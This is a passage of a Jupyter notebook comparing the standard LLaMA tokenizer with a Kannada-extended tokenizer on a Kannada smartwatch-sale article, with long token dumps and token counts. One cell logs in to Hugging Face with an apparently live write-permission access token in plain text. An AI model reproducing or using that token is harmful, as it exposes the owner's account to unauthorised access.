'<0xBE>', '<0xE0>', '<0xB2>', '<0xAA>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x82>', '<0xE0>', '<0xB2>', '<0x97>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x88>', '<0xE0>', '<0xB2>', '<0xA4>', '್', '<0xE0>', '<0xB2>', '<0xAF>', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0x9C>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB3>', '<0x88>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9C>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xAB>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '▁', '<0xE0>', '<0xB2>', '<0xAC>', '್', 'ರ', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x82>', '<0xE0>', '<0xB2>', '<0xA1>', '್', '▁', '<0xE0>', '<0xB2>', '<0xA1>', '<0xE0>', '<0xB3>', '<0x87>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB3>', '<0x87>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '▁', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB3>', '<0x88>', '<0xE0>', '<0xB2>', '<0xB5>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0x86>', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '.', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9C>', '್', '▁', '<0xE0>', '<0xB2>', '<0xAB>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '▁', '<0xE0>', '<0xB2>', '<0xA8>', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xA7>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x83>', '<0xE0>', '<0xB2>', '<0xA4>', '▁', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0xAC>', '್', '▁', 
'<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB3>', '<0x88>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '▁', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x82>', '<0xE0>', '<0xB2>', '<0xA1>', '▁', 'ರ', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB3>', '<0x87>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB3>', '<0x88>', '<0xE0>', '<0xB2>', '<0xB5>', '್', '▁', '<0xE0>', '<0xB2>', '<0x86>', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '.', '▁', '<0xE0>', '<0xB2>', '<0x88>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB3>', '<0x87>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0x87>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x87>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0xAA>', '್', '<0xE0>', '<0xB2>', '<0x9F>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0x82>', '<0xE0>', '<0xB2>', '<0xAC>', 'ರ', '್', '▁', '1', '2', '▁', 'ರ', '<0xE0>', '<0xB2>', '<0xB5>', 'ರ', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB3>', '<0x86>', '▁', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB2>', '<0xA1>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '.', '▁', '<0xE0>', '<0xB2>', '<0x87>', '<0xE0>', '<0xB2>', '<0xA6>', 'ರ', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9C>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xAB>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '▁', '<0xE0>', '<0xB2>', '<0x9C>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x9F>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x8E>', '<0xE0>', '<0xB2>', '<0xB8>', '್', '▁', '2', '▁', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0x9C>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xA4>', '್', 'ರ', '▁', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xAD>', '್', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '.', '▁', '<0xE0>', '<0xB2>', '<0x86>', '<0xE0>', '<0xB2>', '<0xA6>', 'ರ', '<0xE0>', '<0xB3>', '<0x86>', '▁', '<0xE0>', '<0xB2>', '<0xAC>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xAA>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xA4>', '್', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', 
'<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0xAC>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xAA>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0xAA>', '್', 'ರ', '<0xE0>', '<0xB3>', '<0x8A>', '▁', '<0xE0>', '<0xB2>', '<0xAB>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xAA>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', '್', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', 'ರ', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0xA6>', 'ರ', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xAD>', '್', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '.', '<0x0A>']\n",
"LLaMA tokenizer n_tokens=2789\n",
"Tokenized by kannada-LLaMA tokenizer:['<0x0A>', 'ರಸ', '್ತು', 'ತ', '▁ದಿನಗಳಲ್ಲಿ', '▁ಸ್', 'ಮಾರ್', 'ಟ್', '\\u200c', 'ಫೋನ್', '\\u200c', 'ಗಳು', '▁ಮಾತ್ರವಲ್ಲ', '▁ಸ್', 'ಮಾರ್', 'ಟ್', '\\u200c', 'ವಾ', 'ಚ್', '\\u200c', 'ಗಳು', '▁ಕೂಡ', '▁ಸಿಕ್ಕ', 'ಾಪ', 'ಟ್ಟೆ', '▁ಸೌಂಡ್', '\\u200c', '▁ಮಾಡುತ್ತಿವೆ', '.', '▁ಫಿಟ್', 'ನೆ', 'ಸ್', '\\u200c', '▁ಆಧಾರಿತ', '▁ಸ್', 'ಮಾರ್', 'ಟ್', '\\u200c', 'ವಾ', 'ಚ್', '\\u200c', 'ಗಳಿಗೆ', '▁ಟೆಕ್', '\\u200c', '▁ವಲಯದಲ್ಲಿ', '▁ಭಾರಿ', '▁ಬೇಡಿಕೆ', '▁ಇದೆ', '.', '▁ಇದೇ', '▁ಕಾರಣಕ್ಕೆ', '▁ಹಲವು', '▁ಕಂಪ', 'ೆ', 'ನಿ', 'ಗಳು', '▁ವೈ', 'ವಿಧ', '್ಯ', 'ಮಯ', '▁ಸ್', 'ಮಾರ್', 'ಟ್', '\\u200c', 'ವಾ', 'ಚ್', '\\u200c', 'ಗಳನ್ನು', '▁ಪರಿ', 'ಚ', 'ಯಿ', 'ಸಿ', 'ವೆ', '.', '▁ಇವುಗಳಲ್ಲಿ', '▁ಅಮ', 'ಾ', 'ಜ್', '\\u200c', 'ಫಿ', 'ಟ್', '\\u200c', '▁ಕೂಡ', '▁ಬ', 'ಳ', 'ಕೆ', 'ದಾರರ', '▁ನೆ', 'ಚ್ಚಿ', 'ನ', '▁ಬ್ರಾಂಡ್', '\\u200c', '▁ಎ', 'ನಿ', 'ಸಿ', 'ಕೊಂಡಿದೆ', '.', '▁ಸದ್ಯ', '▁ಅಮ', 'ಾ', 'ಜ್', '\\u200c', 'ಫಿ', 'ಟ್', '\\u200c', '▁ತನ್ನ', '▁ವಿ', 'ಭಿ', 'ನ್ನ', '▁ಸ್', 'ಮಾರ್', 'ಟ್', '\\u200c', 'ವಾ', 'ಚ್', '\\u200c', 'ಗಳಿಂದ', '▁ಗುರು', 'ತಿ', 'ಸಿ', 'ಕೊಂಡಿದೆ', '.', '▁ಇ', 'ದೀ', 'ಗ', '▁ತನ್ನ', '▁ಸ್', 'ಮಾರ್', 'ಟ್', '\\u200c', 'ವಾ', 'ಚ್', '\\u200c', 'ಗಳ', '▁ಮೇಲೆ', '▁ಭರ', '್', 'ಜ', 'ರಿ', '▁ಡಿಸ್', 'ಕೌ', 'ಂಟ್', '\\u200c', '▁ಅನ್ನು', '▁ನೀಡುತ್ತಿದೆ', '.', '<0x0A>', 'ಹೌದು', ',', '▁ಅಮ', 'ಾ', 'ಜ್', '\\u200c', 'ಫಿ', 'ಟ್', '\\u200c', '▁ಕಂಪ', 'ೆ', 'ನಿ', '▁ತನ್ನ', '▁ಕೆಲವು', '▁ಸ್', 'ಮಾರ್', 'ಟ್', '\\u200c', 'ವಾ', 'ಚ್', '\\u200c', 'ಗಳ', '▁ಮೇಲೆ', '▁ಬಿಗ್', '\\u200c', '▁ಡಿಸ್', 'ಕೌ', 'ಂಟ್', '\\u200c', '▁ನೀಡುತ್ತಿದೆ', '.', '▁ನೀವು', '▁ಕೂಡ', '▁ಅಮ', 'ಾ', 'ಜ್', '\\u200c', 'ಫಿ', 'ಟ್', '\\u200c', '▁ಸ್', 'ಮಾರ್', 'ಟ್', '\\u200c', 'ವಾ', 'ಚ್', '\\u200c', 'ಗಳನ್ನು', '▁ರಿಯಾ', 'ಯಿ', 'ತಿ', '▁ದರದಲ್ಲಿ', '▁ಖ', 'ರೀ', 'ದಿ', 'ಸಲು', '▁ಬ', 'ಯ', 'ಸಿ', 'ದರ', 'ೆ', '▁ಇದು', '▁ಉತ್', 'ತ', 'ಮ', '▁ಸಮಯ', 'ವಾಗಿದೆ', '.', '▁ಅದರಲ್ಲೂ', '▁ಜನಪ್ರಿಯ', '▁ಸ್', 'ಮಾರ್', 'ಟ್', '\\u200c', 'ವಾ', 'ಚ್', '\\u200c', 'ಗಳಾದ', '▁ಅಮ', 'ಾ', 'ಜ್', '\\u200c', 'ಫಿ', 'ಟ್', '▁ಜಿಟಿ', 'ಎಸ್', '▁2', '▁ಮಿನಿ', ',', '▁ಬಿ', 'ಪ್', '▁ಯು', '▁ಪ್ರೊ', '▁ಮತ್ತು', '▁ಬಿ', 'ಪ್', '\\u200c', 'ಯು', '▁ವಾಚ್', '\\u200c', 'ಗಳಿಗೆ', '▁ರಿಯಾ', 'ಯಿ', 'ತಿ', '▁ಘ', 'ೋ', 'ಷಿ', 'ಸಿ', 'ದೆ', '.', '▁ಹಾಗಾದ್ರೆ', '▁ಅಮ', 'ಾ', 'ಜ್', '\\u200c', 'ಫಿ', 'ಟ್', '\\u200c', '▁ವಾಚ್', '\\u200c', 'ಗಳಿಗೆ', '▁ಯಾವ', 'ೆಲ್ಲಾ', '▁ರಿಯಾ', 'ಯಿ', 'ತಿ', '▁ದೊರೆಯ', 'ುತ್ತಿದೆ', '▁ಅನ್ನ', 'ೊ', 'ದ', 'ನ್ನ', '▁ಈ', '▁ಲೇ', 'ಖ', 'ನ', 'ದಲ್ಲಿ', '▁ತಿಳಿಸಿಕೊಡ', '್ತೀವಿ', '▁ಓದಿ', 'ರಿ', '.', '<0x0A>', 'ಆ', 'ನ್', '\\u200c', 'ಲೈನ್', '\\u200c', '▁ಶಾಪಿಂಗ್', '\\u200c', '▁ದ', 'ೈ', 'ತ್ಯ', '▁ಅಮ', 'ೆ', 'ಜಾನ್', '\\u200c', '▁ಸೈಟ್', '\\u200c', 'ನಲ್ಲಿ', '▁ಅಮ', 'ಾ', 'ಜ್', '\\u200c', 'ಫಿ', 'ಟ್', '▁ಬ್ರಾಂಡ್', '▁ಡೇ', '▁ಸೇಲ್', '▁ಲೈವ್', '\\u200c', '▁ಆಗಿದೆ', '.', '▁ಅಲ್ಲದೆ', '▁ಅಮ', 'ಾ', 'ಜ್', '▁ಫಿಟ್', '▁ನ', '▁ಅಧಿಕ', 'ೃ', 'ತ', '▁ವೆಬ್', '▁ಸೈಟ್', '▁ನಲ್ಲಿ', '▁ಕೂಡ', '▁ರಿಯಾ', 'ಯಿ', 'ತಿ', '▁ಸೇಲ್', '\\u200c', '▁ಲೈವ್', '▁ಆಗಿದೆ', '.', '▁ಈ', '▁ಸೇಲ್', '\\u200c', '▁ಇದೇ', '▁ಸೆ', 'ಪ್', 'ಟೆ', 'ಂಬರ್', '▁12', '▁ರವರೆಗೆ', '▁ನಡೆಯಲಿದೆ', '.', '▁ಇದರಲ್ಲಿ', '▁ಅಮ', 'ಾ', 'ಜ್', '\\u200c', 'ಫಿ', 'ಟ್', '▁ಜಿಟಿ', 'ಎಸ್', '▁2', '▁ಮಿನಿ', '▁ಅಮ', 'ೆ', 'ಜಾನ್', '\\u200c', 'ನಲ್ಲಿ', '▁ಮಾತ್ರ', '▁ಲಭ್ಯವಿದೆ', '.', '▁ಆದರೆ', '▁ಬಿ', 'ಪ್', '\\u200c', '▁ಯು', '▁ಮತ್ತು', '▁ಬಿ', 'ಪ್', '\\u200c', '▁ಯು', '▁ಪ್ರೊ', '▁ಫ್ಲ', 'ಿ', 'ಪ್', '\\u200c', 'ಕಾರ್', 'ಟ್', '\\u200c', 'ನಲ್ಲಿ', '▁ರಿಯಾ', 'ಯಿ', 'ತಿ', '▁ದರದಲ್ಲಿ', '▁ಲಭ್ಯವಾಗಲಿದೆ', '.', '<0x0A>']\n",
"kannada LLaMA tokenizer n_tokens=398\n"
]
}
],
"source": [
"print(tokenizer.all_special_ids)\n",
"print(tokenizer.special_tokens_map)\n",
"text = \"\"\"\n",
"ರಸ್ತುತ ದಿನಗಳಲ್ಲಿ ಸ್ಮಾರ್ಟ್ಫೋನ್ಗಳು ಮಾತ್ರವಲ್ಲ ಸ್ಮಾರ್ಟ್ವಾಚ್ಗಳು ಕೂಡ ಸಿಕ್ಕಾಪಟ್ಟೆ ಸೌಂಡ್ ಮಾಡುತ್ತಿವೆ. ಫಿಟ್ನೆಸ್ ಆಧಾರಿತ ಸ್ಮಾರ್ಟ್ವಾಚ್ಗಳಿಗೆ ಟೆಕ್ ವಲಯದಲ್ಲಿ ಭಾರಿ ಬೇಡಿಕೆ ಇದೆ. ಇದೇ ಕಾರಣಕ್ಕೆ ಹಲವು ಕಂಪೆನಿಗಳು ವೈವಿಧ್ಯಮಯ ಸ್ಮಾರ್ಟ್ವಾಚ್ಗಳನ್ನು ಪರಿಚಯಿಸಿವೆ. ಇವುಗಳಲ್ಲಿ ಅಮಾಜ್ಫಿಟ್ ಕೂಡ ಬಳಕೆದಾರರ ನೆಚ್ಚಿನ ಬ್ರಾಂಡ್ ಎನಿಸಿಕೊಂಡಿದೆ. ಸದ್ಯ ಅಮಾಜ್ಫಿಟ್ ತನ್ನ ವಿಭಿನ್ನ ಸ್ಮಾರ್ಟ್ವಾಚ್ಗಳಿಂದ ಗುರುತಿಸಿಕೊಂಡಿದೆ. ಇದೀಗ ತನ್ನ ಸ್ಮಾರ್ಟ್ವಾಚ್ಗಳ ಮೇಲೆ ಭರ್ಜರಿ ಡಿಸ್ಕೌಂಟ್ ಅನ್ನು ನೀಡುತ್ತಿದೆ.\n",
"ಹೌದು, ಅಮಾಜ್ಫಿಟ್ ಕಂಪೆನಿ ತನ್ನ ಕೆಲವು ಸ್ಮಾರ್ಟ್ವಾಚ್ಗಳ ಮೇಲೆ ಬಿಗ್ ಡಿಸ್ಕೌಂಟ್ ನೀಡುತ್ತಿದೆ. ನೀವು ಕೂಡ ಅಮಾಜ್ಫಿಟ್ ಸ್ಮಾರ್ಟ್ವಾಚ್ಗಳನ್ನು ರಿಯಾಯಿತಿ ದರದಲ್ಲಿ ಖರೀದಿಸಲು ಬಯಸಿದರೆ ಇದು ಉತ್ತಮ ಸಮಯವಾಗಿದೆ. ಅದರಲ್ಲೂ ಜನಪ್ರಿಯ ಸ್ಮಾರ್ಟ್ವಾಚ್ಗಳಾದ ಅಮಾಜ್ಫಿಟ್ ಜಿಟಿಎಸ್ 2 ಮಿನಿ, ಬಿಪ್ ಯು ಪ್ರೊ ಮತ್ತು ಬಿಪ್ಯು ವಾಚ್ಗಳಿಗೆ ರಿಯಾಯಿತಿ ಘೋಷಿಸಿದೆ. ಹಾಗಾದ್ರೆ ಅಮಾಜ್ಫಿಟ್ ವಾಚ್ಗಳಿಗೆ ಯಾವೆಲ್ಲಾ ರಿಯಾಯಿತಿ ದೊರೆಯುತ್ತಿದೆ ಅನ್ನೊದನ್ನ ಈ ಲೇಖನದಲ್ಲಿ ತಿಳಿಸಿಕೊಡ್ತೀವಿ ಓದಿರಿ.\n",
"ಆನ್ಲೈನ್ ಶಾಪಿಂಗ್ ದೈತ್ಯ ಅಮೆಜಾನ್ ಸೈಟ್ನಲ್ಲಿ ಅಮಾಜ್ಫಿಟ್ ಬ್ರಾಂಡ್ ಡೇ ಸೇಲ್ ಲೈವ್ ಆಗಿದೆ. ಅಲ್ಲದೆ ಅಮಾಜ್ ಫಿಟ್ ನ ಅಧಿಕೃತ ವೆಬ್ ಸೈಟ್ ನಲ್ಲಿ ಕೂಡ ರಿಯಾಯಿತಿ ಸೇಲ್ ಲೈವ್ ಆಗಿದೆ. ಈ ಸೇಲ್ ಇದೇ ಸೆಪ್ಟೆಂಬರ್ 12 ರವರೆಗೆ ನಡೆಯಲಿದೆ. ಇದರಲ್ಲಿ ಅಮಾಜ್ಫಿಟ್ ಜಿಟಿಎಸ್ 2 ಮಿನಿ ಅಮೆಜಾನ್ನಲ್ಲಿ ಮಾತ್ರ ಲಭ್ಯವಿದೆ. ಆದರೆ ಬಿಪ್ ಯು ಮತ್ತು ಬಿಪ್ ಯು ಪ್ರೊ ಫ್ಲಿಪ್ಕಾರ್ಟ್ನಲ್ಲಿ ರಿಯಾಯಿತಿ ದರದಲ್ಲಿ ಲಭ್ಯವಾಗಲಿದೆ.\n",
"\"\"\"\n",
"print(\"Test text:\\n\", text)\n",
"llama_tokenized = llama_tokenizer.tokenize(text)\n",
"kannada_llama_tokenized = kannada_llama_tokenizer.tokenize(text)\n",
"print(f\"Tokenized by LLaMA tokenizer:{llama_tokenized}\")\n",
"print(f\"LLaMA tokenizer n_tokens={len(llama_tokenized)}\")\n",
"print(f\"Tokenized by kannada-LLaMA tokenizer:{kannada_llama_tokenized}\")\n",
"print(f\"kannada LLaMA tokenizer n_tokens={len(kannada_llama_tokenized)}\")"
]
},
{
"cell_type": "code",
"execution_count": 20,
"metadata": {},
"outputs": [
{
"name": "stderr",
"output_type": "stream",
"text": [
"huggingface/tokenizers: The current process just got forked, after parallelism has already been used. Disabling parallelism to avoid deadlocks...\n",
"To disable this warning, you can either:\n",
"\t- Avoid using `tokenizers` before the fork if possible\n",
"\t- Explicitly set the environment variable TOKENIZERS_PARALLELISM=(true | false)\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"Token will not been saved to git credential helper. Pass `add_to_git_credential=True` if you want to set the git credential as well.\n",
"Token is valid (permission: write).\n",
"Your token has been saved to /home/adithya/.cache/huggingface/token\n",
"Login successful\n"
]
}
],
"source": [
"!huggingface-cli login --token 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"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": [
"## Loading From Hugging Face\n",
"\n",
"fast_llama_tokenizer = LlamaTokenizer.from_pretrained(\"hf-internal-testing/llama-tokenizer\")"
]
},
{
"cell_type": "code",
"execution_count": 22,
"metadata": {},
"outputs": [],
"source": [
"kannada_llama_tokenizer_hf = LlamaTokenizer.from_pretrained(\"CognitiveLab/Project_K_Tokenizer\")"
]
},
{
"cell_type": "code",
"execution_count": 23,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"Tokenized by LLaMA tokenizer:['▁', '<0x0A>', 'ರ', '<0xE0>', '<0xB2>', '<0xB8>', '್', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB3>', '<0x81>', '<0xE0>', '<0xB2>', '<0xA4>', '▁', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '್', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', '್', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xAB>', '<0xE0>', '<0xB3>', '<0x8B>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xA4>', '್', 'ರ', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '್', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', '್', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9A>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x82>', '<0xE0>', '<0xB2>', '<0xA1>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x95>', '್', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xAA>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '<0xE0>', '<0xB2>', '<0x9F>', '<0xE0>', '<0xB3>', '<0x86>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB3>', '<0x8C>', '<0xE0>', '<0xB2>', '<0x82>', '<0xE0>', '<0xB2>', '<0xA1>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xA1>', '<0xE0>', '<0xB3>', '<0x81>', '<0xE0>', '<0xB2>', '<0xA4>', '್', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB3>', '<0x86>', '.', '▁', '<0xE0>', '<0xB2>', '<0xAB>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0xB8>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0x86>', '<0xE0>', '<0xB2>', '<0xA7>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA4>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '್', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', '್', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9A>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', 